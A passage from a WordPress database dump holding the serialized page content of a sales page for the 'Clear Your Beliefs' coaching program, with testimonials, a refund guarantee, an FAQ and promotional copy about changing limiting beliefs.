target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1618, 2049, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:62840:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" 